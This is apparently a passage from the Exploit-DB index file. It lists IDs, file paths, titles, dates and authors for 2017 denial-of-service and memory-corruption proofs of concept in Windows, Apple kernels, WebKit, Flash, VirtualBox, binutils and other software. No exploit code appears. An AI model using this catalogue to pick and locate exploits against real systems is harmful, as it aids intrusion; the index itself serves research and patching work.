'USP10!otlCacheManager::GlyphsSubstituted' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41650,exploits/windows/dos/41650.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption in 'USP10!MergeLigRecords' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41651,exploits/windows/dos/41651.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Buffer Overflow in 'USP10!ttoGetTableData' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41652,exploits/windows/dos/41652.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Out-of-Bounds Write in 'USP10!UpdateGlyphFlags' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41653,exploits/windows/dos/41653.txt,"Microsoft Windows - Uniscribe Font Processing Heap-Based Memory Corruption Around 'USP10!BuildFSM' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41654,exploits/windows/dos/41654.txt,"Microsoft Windows - Uniscribe Font Processing Buffer Overflow in 'USP10!FillAlternatesList' (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41655,exploits/windows/dos/41655.txt,"Microsoft Windows - Uniscribe Font Processing Multiple Heap-Based Out-of-Bounds and Wild Reads (MS17-011)",2017-03-20,"Google Security Research",windows,dos, -41656,exploits/windows/dos/41656.txt,"Microsoft GDI+ - 'gdiplus!GetRECTSForPlayback' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos, -41657,exploits/windows/dos/41657.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!Fill_ushort_ELUTs_from_lut16Tag' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos, -41658,exploits/windows/dos/41658.txt,"Microsoft Windows - Uniscribe Heap-Based Out-of-Bounds Read in 'USP10!ScriptApplyLogicalWidth' Triggered via EMF (MS17-013)",2017-03-20,"Google Security Research",windows,dos, -41659,exploits/windows/dos/41659.txt,"Microsoft Color Management Module 'icm32.dll' - 'icm32!LHCalc3toX_Di16_Do16_Lut8_G32' Out-of-Bounds Read (MS17-013)",2017-03-20,"Google Security Research",windows,dos, -41660,exploits/multiple/dos/41660.html,"Mozilla Firefox - 'table' Use-After-Free",2017-03-20,"Google Security Research",multiple,dos, -41661,exploits/windows/dos/41661.html,"Microsoft Internet Explorer 11 - 'textarea.defaultValue' Memory Disclosure (MS17-006)",2017-03-20,"Google Security Research",windows,dos, -41667,exploits/windows/dos/41667.py,"SpyCamLizard 1.230 - Denial of Service",2017-03-22,ScrR1pTK1dd13,windows,dos, -41668,exploits/multiple/dos/41668.txt,"APNGDis 2.8 - 'chunk size descriptor' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos, -41669,exploits/multiple/dos/41669.txt,"APNGDis 2.8 - 'image width / height chunk' Heap Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos, -41670,exploits/multiple/dos/41670.txt,"APNGDis 2.8 - 'filename' Stack Buffer Overflow",2017-03-14,"Alwin Peppels",multiple,dos, -41791,exploits/macos/dos/41791.c,"Apple macOS Kernel 10.12.3 (16D32) - Use-After-Free Due to Double-Release in posix_spawn",2017-04-04,"Google Security Research",macos,dos, -41792,exploits/multiple/dos/41792.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - SIOCSIFORDER Socket ioctl Memory Corruption Due to Bad Bounds Checking",2017-04-04,"Google Security Research",multiple,dos, -41797,exploits/macos/dos/41797.c,"Apple macOS Kernel 10.12.3 (16D32) - 'audit_pipe_open' Off-by-One Memory Corruption",2017-04-04,"Google Security Research",macos,dos, -41794,exploits/multiple/dos/41794.c,"Apple macOS/iOS Kernel 10.12.3 (16D32) - Bad Locking in necp_open Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41826,exploits/hardware/dos/41826.txt,"Cesanta Mongoose OS - Use-After-Free",2017-04-06,"Compass Security",hardware,dos, -41778,exploits/multiple/dos/41778.cc,"Apple macOS/IOS 10.12.2 (16C67) - 'mach_msg' Heap Overflow",2017-03-30,"Google Security Research",multiple,dos, -41781,exploits/linux/dos/41781.c,"BackBox OS - Denial of Service",2017-04-02,FarazPajohan,linux,dos, -41790,exploits/macos/dos/41790.c,"Apple macOS Kernel 10.12.2 (16C67) - 'AppleIntelCapriController::GetLinkConfig' Code Execution Due to Lack of Bounds Checking",2017-04-04,"Google Security Research",macos,dos, -42223,exploits/windows/dos/42223.cpp,"Microsoft Windows - 'win32k!NtGdiExtGetObjectW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42750,exploits/windows/dos/42750.cpp,"Microsoft Windows Kernel - 'win32k!NtQueryCompositionSurfaceBinding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos, -41916,exploits/windows/dos/41916.py,"PrivateTunnel Client 2.8 - Local Buffer Overflow (SEH)",2017-04-25,Muhann4d,windows,dos, -42459,exploits/windows/dos/42459.html,"Microsoft Edge 38.14393.1066.0 - 'CInputDateTimeScrollerElement::_SelectValueInternal' Out-of-Bounds Read",2017-08-16,"Google Security Research",windows,dos, -41715,exploits/linux/dos/41715.txt,"wifirxpower - Local Buffer Overflow",2017-03-23,"Nassim Asrir",linux,dos, -41734,exploits/windows/dos/41734.c,"Microsoft Visual Studio 2015 update 3 - Denial of Service",2017-03-26,"Peter Baris",windows,dos, -41737,exploits/windows/dos/41737.txt,"Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow",2017-03-27,"Nassim Asrir",windows,dos, -41741,exploits/multiple/dos/41741.html,"Apple Safari - 'DateTimeFormat.format' Type Confusion",2017-03-27,"Google Security Research",multiple,dos, -41742,exploits/multiple/dos/41742.html,"Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode",2017-03-27,"Google Security Research",multiple,dos, -41743,exploits/multiple/dos/41743.html,"Apple Safari - Out-of-Bounds Read when Calling Bound Function",2017-03-27,"Google Security Research",multiple,dos, -41752,exploits/hardware/dos/41752.pl,"MikroTik RouterBoard 6.38.5 - Denial of Service",2017-03-28,FarazPajohan,hardware,dos, -41755,exploits/windows/dos/41755.py,"VX Search Enterprise 9.5.12 - 'Verify Email' Buffer Overflow",2017-03-28,ScrR1pTK1dd13,windows,dos, -41756,exploits/windows/dos/41756.txt,"Microsoft Outlook - HTML Email Denial of Service",2017-03-28,"Haifei Li",windows,dos, -41767,exploits/linux/dos/41767.txt,"Linux Kernel (Ubuntu 11.10/12.04) - binfmt_script Stack Data Disclosure",2014-01-14,halfdog,linux,dos, -41768,exploits/linux/dos/41768.txt,"Apache 2.2 - Scoreboard Invalid Free On Shutdown",2012-01-11,halfdog,linux,dos, -41769,exploits/linux/dos/41769.txt,"Apache < 2.0.64 / < 2.2.21 mod_setenvif - Integer Overflow",2011-11-02,halfdog,linux,dos, -41806,exploits/hardware/dos/41806.txt,"Broadcom Wi-Fi SoC - Heap Overflow 'wlc_tdls_cal_mic_chk' Due to Large RSN IE in TDLS Setup Confirm Frame",2017-04-04,"Google Security Research",hardware,dos, -41807,exploits/multiple/dos/41807.html,"Apple WebKit 10.0.2 - HTMLInputElement Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41809,exploits/multiple/dos/41809.html,"Apple WebKit - 'RenderLayer' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41810,exploits/multiple/dos/41810.html,"Apple WebKit - Negative-Size memmove in HTMLFormElement",2017-04-04,"Google Security Research",multiple,dos, -41811,exploits/multiple/dos/41811.html,"Apple WebKit - 'FormSubmission::create' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41812,exploits/multiple/dos/41812.html,"Apple WebKit - 'ComposedTreeIterator::traverseNextInShadowTree' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41813,exploits/multiple/dos/41813.html,"Apple WebKit - 'table' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41814,exploits/multiple/dos/41814.html,"Apple WebKit - 'WebCore::toJS' Use-After-Free",2017-04-04,"Google Security Research",multiple,dos, -41823,exploits/windows/dos/41823.py,"CommVault Edge 11 SP6 - Stack Buffer Overflow (PoC)",2017-03-16,redr2e,windows,dos, -42088,exploits/windows/dos/42088.txt,"Microsoft MsMpEng - Remote Use-After-Free Due to Design Issue in GC Engine",2017-05-30,"Google Security Research",windows,dos, -41851,exploits/windows/dos/41851.txt,"Moxa MXview 2.8 - Denial of Service",2017-04-10,hyp3rlinx,windows,dos, -41867,exploits/multiple/dos/41867.html,"Apple WebKit - 'JSC::B3::Procedure::resetReachability' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos, -41868,exploits/multiple/dos/41868.html,"Apple WebKit - 'Document::adoptNode' Use-After-Free",2017-04-11,"Google Security Research",multiple,dos, -41869,exploits/multiple/dos/41869.html,"Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow",2017-04-11,"Google Security Research",multiple,dos, -41879,exploits/windows/dos/41879.txt,"Microsoft Windows Kernel - 'win32k.sys' Multiple 'NtGdiGetDIBitsInternal' System Call",2017-04-13,"Google Security Research",windows,dos, -41880,exploits/windows/dos/41880.cpp,"Microsoft Windows Kernel - 'win32kfull!SfnINLPUAHDRAWMENUITEM' Stack Memory Disclosure",2017-04-13,"Google Security Research",windows,dos, -41891,exploits/windows/dos/41891.rb,"Microsoft Windows - Unauthenticated SMB Remote Code Execution Scanner (MS17-010) (Metasploit)",2017-04-17,"Sean Dillon",windows,dos,445 -41893,exploits/linux/dos/41893.txt,"pinfo 0.6.9 - Local Buffer Overflow",2017-04-18,"Nassim Asrir",linux,dos, -41898,exploits/linux/dos/41898.txt,"Dmitry 1.3a - Local Buffer Overflow",2017-04-19,FarazPajohan,linux,dos, -41905,exploits/multiple/dos/41905.txt,"Oracle VM VirtualBox - Environment and ioctl Unprivileged Host User to Host Kernel Privilege Escalation",2017-04-20,"Google Security Research",multiple,dos, -41906,exploits/multiple/dos/41906.txt,"Oracle VM VirtualBox - 'virtio-net' Guest-to-Host Out-of-Bounds Write",2017-04-20,"Google Security Research",multiple,dos, -41911,exploits/windows/dos/41911.py,"Easy MOV Converter 1.4.24 - Local Buffer Overflow (SEH)",2017-03-12,Muhann4d,windows,dos, -41931,exploits/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos, -41932,exploits/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos, -41941,exploits/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos, -41945,exploits/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos, -41949,exploits/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos, -41954,exploits/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos, -41957,exploits/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos, -41965,exploits/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos, -41974,exploits/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111 -41981,exploits/android/dos/41981.txt,"LG G4 MRA58K - 'liblg_parser_mkv.so' Bad Allocation Calls",2017-05-09,"Google Security Research",android,dos, -41982,exploits/android/dos/41982.txt,"LG G4 MRA58K - 'mkvparser::Tracks constructor' Failure to Initialise Pointers",2017-05-09,"Google Security Research",android,dos, -41983,exploits/android/dos/41983.txt,"LG G4 MRA58K - 'mkvparser::Block::Block' Heap Buffer Overflow",2017-05-09,"Google Security Research",android,dos, -41984,exploits/multiple/dos/41984.txt,"wolfSSL 3.10.2 - x509 Certificate Text Parsing Off-by-One",2017-05-09,Talos,multiple,dos, -41991,exploits/linux/dos/41991.py,"SAP SAPCAR 721.510 - Heap-Based Buffer Overflow",2017-05-10,"Core Security",linux,dos, -41993,exploits/multiple/dos/41993.py,"OpenVPN 2.4.0 - Unauthenticated Denial of Service",2017-05-11,QuarksLab,multiple,dos,1194 -42001,exploits/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos, -42002,exploits/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos, -42006,exploits/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos, -42007,exploits/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos, -42008,exploits/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos, -42009,exploits/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos, -42014,exploits/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos, -42017,exploits/multiple/dos/42017.txt,"Adobe Flash - AVC Deblocking Out-of-Bounds Read",2017-05-17,"Google Security Research",multiple,dos, -42018,exploits/multiple/dos/42018.txt,"Adobe Flash - Margin Handling Heap Corruption",2017-05-17,"Google Security Research",multiple,dos, -42019,exploits/multiple/dos/42019.txt,"Adobe Flash - Out-of-Bounds Read in Getting TextField Width",2017-05-17,"Google Security Research",multiple,dos, -42021,exploits/windows/dos/42021.txt,"Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation",2017-05-17,"Google Security Research",windows,dos, -42027,exploits/multiple/dos/42027.html,"Mozilla Firefox 50 < 55 - Stack Overflow Denial of Service",2017-05-17,"Geeknik Labs",multiple,dos, -42081,exploits/windows/dos/42081.txt,"Microsoft MsMpEng - Multiple Crashes While Scanning Malformed Files",2017-05-29,"Google Security Research",windows,dos, -42040,exploits/windows/dos/42040.py,"Sure Thing Disc Labeler 6.2.138.0 - Buffer Overflow (PoC)",2017-05-19,"Chance Johnson",windows,dos, -42046,exploits/macos/dos/42046.txt,"Apple macOS - '32-bit syscall exit' Kernel Register Leak",2017-05-22,"Google Security Research",macos,dos, -42047,exploits/macos/dos/42047.txt,"Apple macOS - 'stackshot' Raw Frame Pointers",2017-05-22,"Google Security Research",macos,dos, -42048,exploits/linux/dos/42048.c,"Linux Kernel 4.11 - eBPF Verifier Log Leaks Lower Half of map Pointer",2017-05-22,"Google Security Research",linux,dos, -42049,exploits/multiple/dos/42049.txt,"Apple iOS/macOS - Memory Corruption Due to Bad Bounds Checking in NSCharacterSet Coding for NSKeyedUnarchiver",2017-05-23,"Google Security Research",multiple,dos, -42050,exploits/multiple/dos/42050.txt,"Apple iOS/macOS - NSUnarchiver Heap Corruption Due to Lack of Bounds Checking in [NSBuiltinCharacterSet initWithCoder:]",2017-05-23,"Google Security Research",multiple,dos, -42051,exploits/multiple/dos/42051.txt,"Apple iOS/macOS - 'TIKeyboardLayout initWithCoder:' NSKeyedArchiver Heap Corruption Due to Rounding Error",2017-05-23,"Google Security Research",multiple,dos, -42052,exploits/multiple/dos/42052.txt,"Apple iOS/macOS - 'CAMediaTimingFunctionBuiltin' NSKeyedArchiver Memory Corruption Due to Lack of Bounds Checking",2017-05-23,"Google Security Research",multiple,dos, -42054,exploits/multiple/dos/42054.c,"Apple iOS/macOS Kernel - Use-After-Free Due to Bad Locking in Unix Domain Socket File Descriptor Externalization",2017-05-23,"Google Security Research",multiple,dos, -42055,exploits/multiple/dos/42055.c,"Apple iOS/macOS Kernel - Memory Disclosure Due to Lack of Bounds Checking in netagent Socket Option Handling",2017-05-23,"Google Security Research",multiple,dos, -42056,exploits/macos/dos/42056.c,"Apple macOS - Privilege Escalation Due to Lack of Bounds Checking in HIServices Custom CFObject Serialization",2017-05-23,"Google Security Research",macos,dos, -42063,exploits/multiple/dos/42063.html,"Apple WebKit / Safari 10.0.3(12602.4.8) - 'WebCore::FrameView::scheduleRelayout' Use-After-Free",2017-05-25,"Google Security Research",multiple,dos, -42070,exploits/multiple/dos/42070.c,"Skia Graphics Library - Heap Overflow due to Rounding Error in SkEdge::setLine",2017-05-25,"Google Security Research",multiple,dos, -42071,exploits/multiple/dos/42071.html,"Mozilla Firefox < 53 - 'gfxTextRun' Out-of-Bounds Read",2017-05-25,"Google Security Research",multiple,dos, -42072,exploits/multiple/dos/42072.html,"Mozilla Firefox < 53 - 'ConvolvePixel' Memory Disclosure",2017-05-25,"Google Security Research",multiple,dos, -42073,exploits/windows/dos/42073.py,"Sandboxie 5.18 - Local Denial of Service",2017-05-25,ScrR1pTK1dd13,windows,dos, -42092,exploits/windows/dos/42092.txt,"Microsoft MsMpEng - Use-After-Free via Saved Callers",2017-05-30,"Google Security Research",windows,dos, -42103,exploits/linux/dos/42103.js,"WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure",2017-06-01,"Google Security Research",linux,dos, -42104,exploits/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos, -42108,exploits/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos, -42110,exploits/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos, -42112,exploits/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos, -42115,exploits/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow (PoC)",2017-06-05,FarazPajohan,linux,dos, -42123,exploits/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos, -42124,exploits/multiple/dos/42124.txt,"Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos, -42135,exploits/android/dos/42135.c,"Linux Kernel - 'ping' Local Denial of Service",2017-06-07,"Daniel Jiang",android,dos, -42136,exploits/linux/dos/42136.c,"Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service",2017-06-07,"Marcus Meissner",linux,dos, -42137,exploits/linux/dos/42137.txt,"PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption",2017-06-07,"Tim Kosse",linux,dos,22 -42138,exploits/linux/dos/42138.txt,"Artifex MuPDF - Null Pointer Dereference",2017-06-07,"Kamil Frankowicz",linux,dos, -42139,exploits/linux/dos/42139.txt,"Artifex MuPDF mujstest 1.10a - Null Pointer Dereference",2017-02-17,"Agostino Sarubbo",linux,dos, -42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",windows,dos, -42144,exploits/linux/dos/42144.py,"Mapscrn 2.03 - Local Buffer Overflow",2017-06-09,"Juan Sacco",linux,dos, -42147,exploits/linux/dos/42147.txt,"libcroco 0.6.12 - Denial of Service",2017-06-09,qflb.wu,linux,dos, -42148,exploits/linux/dos/42148.txt,"libquicktime 1.2.4 - Denial of Service",2017-06-09,qflb.wu,linux,dos, -42162,exploits/linux/dos/42162.txt,"GStreamer gst-plugins-bad Plugin - NULL Pointer Dereference",2017-06-12,"Hanno Boeck",linux,dos, -42169,exploits/android/dos/42169.txt,"LG MRA58K - Out-of-Bounds Heap Read in CAVIFileParser::Destroy Resulting in Invalid Free",2017-06-13,"Google Security Research",android,dos, -42170,exploits/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos, -42171,exploits/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos, -42182,exploits/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos, -42188,exploits/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos, -42189,exploits/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos, -42190,exploits/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos, -42191,exploits/multiple/dos/42191.html,"WebKit JSC - 'Intl.getCanonicalLocales' Heap Buffer Overflow",2017-06-16,"Google Security Research",multiple,dos, -42198,exploits/linux/dos/42198.txt,"GNU binutils - 'rx_decode_opcode' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42199,exploits/linux/dos/42199.txt,"GNU binutils - 'disassemble_bytes' Heap Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42200,exploits/linux/dos/42200.txt,"GNU binutils - 'bfd_get_string' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42201,exploits/linux/dos/42201.txt,"GNU binutils - 'decode_pseudodbg_assert_0' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42202,exploits/linux/dos/42202.txt,"GNU binutils - 'ieee_object_p' Stack Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42203,exploits/linux/dos/42203.txt,"GNU binutils - 'print_insn_score16' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42204,exploits/linux/dos/42204.txt,"GNU binutils - 'aarch64_ext_ldst_reglist' Buffer Overflow",2017-06-19,"Alexandre Adamski",linux,dos, -42207,exploits/linux/dos/42207.txt,"Freeware Advanced Audio Coder (FAAC) 1.28 - Denial of Service",2017-06-20,qflb.wu,linux,dos, -42210,exploits/windows/dos/42210.cpp,"Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42211,exploits/windows/dos/42211.cpp,"Microsoft Windows - 'IOCTL 0x390400_ operation code 0x00020000' Kernel KsecDD Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42212,exploits/windows/dos/42212.cpp,"Microsoft Windows - 'IOCTL_MOUNTMGR_QUERY_POINTS' Kernel Mountmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42213,exploits/windows/dos/42213.cpp,"Microsoft Windows - '0x224000 IOCTL (WmiQueryAllData)' Kernel WMIDataDevice Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42214,exploits/windows/dos/42214.txt,"Microsoft Windows - 'win32k!NtGdiEnumFonts' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42215,exploits/windows/dos/42215.cpp,"Microsoft Windows - 'IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS' volmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42216,exploits/windows/dos/42216.cpp,"Microsoft Windows - 'IOCTL_DISK_GET_DRIVE_GEOMETRY_EX' Kernel partmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42217,exploits/windows/dos/42217.cpp,"Microsoft Windows - 'IOCTL_DISK_GET_DRIVE_LAYOUT_EX' Kernel partmgr Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42218,exploits/windows/dos/42218.cpp,"Microsoft Windows - 'nt!NtQueryVolumeInformationFile (FileFsVolumeInformation)' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42219,exploits/windows/dos/42219.cpp,"Microsoft Windows - 'nt!NtNotifyChangeDirectoryFile' Kernel Pool Memory Disclosure",2017-06-21,"Google Security Research",windows,dos, -42220,exploits/windows/dos/42220.cpp,"Microsoft Windows - 'nt!KiDispatchException' Kernel Stack Memory Disclosure in Exception Handling",2017-06-21,"Google Security Research",windows,dos, -42224,exploits/windows/dos/42224.cpp,"Microsoft Windows - 'win32k!NtGdiGetOutlineTextMetricsInternalW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42225,exploits/windows/dos/42225.cpp,"Microsoft Windows - 'win32k!NtGdiGetTextMetricsW' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42226,exploits/windows/dos/42226.cpp,"Microsoft Windows - 'win32k!NtGdiGetRealizationInfo' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42227,exploits/windows/dos/42227.cpp,"Microsoft Windows - 'win32k!ClientPrinterThunk' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42228,exploits/windows/dos/42228.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (BasicLimitInformation_ ExtendedLimitInformation)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42229,exploits/windows/dos/42229.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (ProcessVmCounters)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42230,exploits/windows/dos/42230.txt,"Microsoft Windows - 'win32k!NtGdiMakeFontDir' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42231,exploits/windows/dos/42231.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 12)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42232,exploits/windows/dos/42232.cpp,"Microsoft Windows - 'nt!NtQueryInformationJobObject (information class 28)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42233,exploits/windows/dos/42233.cpp,"Microsoft Windows - 'nt!NtQueryInformationTransaction (information class 1)' Kernel Stack Memory Disclosure",2017-06-22,"Google Security Research",windows,dos, -42234,exploits/windows/dos/42234.txt,"Microsoft Windows - 'USP10!MergeLigRecords' Uniscribe Font Processing Heap-Based Memory Corruption",2017-06-23,"Google Security Research",windows,dos, -42235,exploits/windows/dos/42235.txt,"Microsoft Windows - 'USP10!ttoGetTableData' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42236,exploits/windows/dos/42236.txt,"Microsoft Windows - 'USP10!SubstituteNtoM' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42237,exploits/windows/dos/42237.txt,"Microsoft Windows - 'USP10!CreateIndexTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42238,exploits/windows/dos/42238.txt,"Microsoft Windows - 'USP10!NextCharInLiga' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42239,exploits/windows/dos/42239.txt,"Microsoft Windows - 'USP10!otlSinglePosLookup::getCoverageTable' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42240,exploits/windows/dos/42240.txt,"Microsoft Windows - 'USP10!otlValueRecord::adjustPos' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42241,exploits/windows/dos/42241.txt,"Microsoft Windows - 'USP10!otlReverseChainingLookup::apply' Uniscribe Font Processing Out-of-Bounds Memory Read",2017-06-23,"Google Security Research",windows,dos, -42242,exploits/windows/dos/42242.cpp,"Microsoft Windows - 'nt!NtQueryInformationResourceManager (information class 0)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos, -42243,exploits/windows/dos/42243.txt,"Microsoft Windows Kernel - 'ATMFD.DLL' Out-of-Bounds Read due to Malformed Name INDEX in the CFF Table",2017-06-23,"Google Security Research",windows,dos, -42244,exploits/windows/dos/42244.cpp,"Microsoft Windows - 'nt!NtQueryInformationWorkerFactory (WorkerFactoryBasicInformation)' Kernel Stack Memory Disclosure",2017-06-23,"Google Security Research",windows,dos, -42245,exploits/multiple/dos/42245.txt,"unrar 5.40 - 'VMSF_DELTA' Filter Arbitrary Memory Write",2017-06-23,"Google Security Research",multiple,dos, -42246,exploits/windows/dos/42246.html,"Microsoft Edge - 'CssParser::RecordProperty' Type Confusion",2017-06-23,"Google Security Research",windows,dos, -42247,exploits/multiple/dos/42247.txt,"Adobe Flash - AVC Edge Processing Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos, -42248,exploits/multiple/dos/42248.txt,"Adobe Flash - Image Decoding Out-of-Bounds Read",2017-06-23,"Google Security Research",multiple,dos, -42249,exploits/multiple/dos/42249.txt,"Adobe Flash - ATF Parser Heap Corruption",2017-06-23,"Google Security Research",multiple,dos, -42253,exploits/windows/dos/42253.html,"NTFS 3.1 - Master File Table Denial of Service",2017-06-26,EagleWire,windows,dos, -42258,exploits/linux/dos/42258.txt,"LAME 3.99.5 - 'II_step_one' Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos, -42259,exploits/linux/dos/42259.txt,"LAME 3.99.5 - 'III_dequantize_sample' Stack Based Buffer Overflow",2017-06-26,"Agostino Sarubbo",linux,dos, -42260,exploits/multiple/dos/42260.py,"IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer 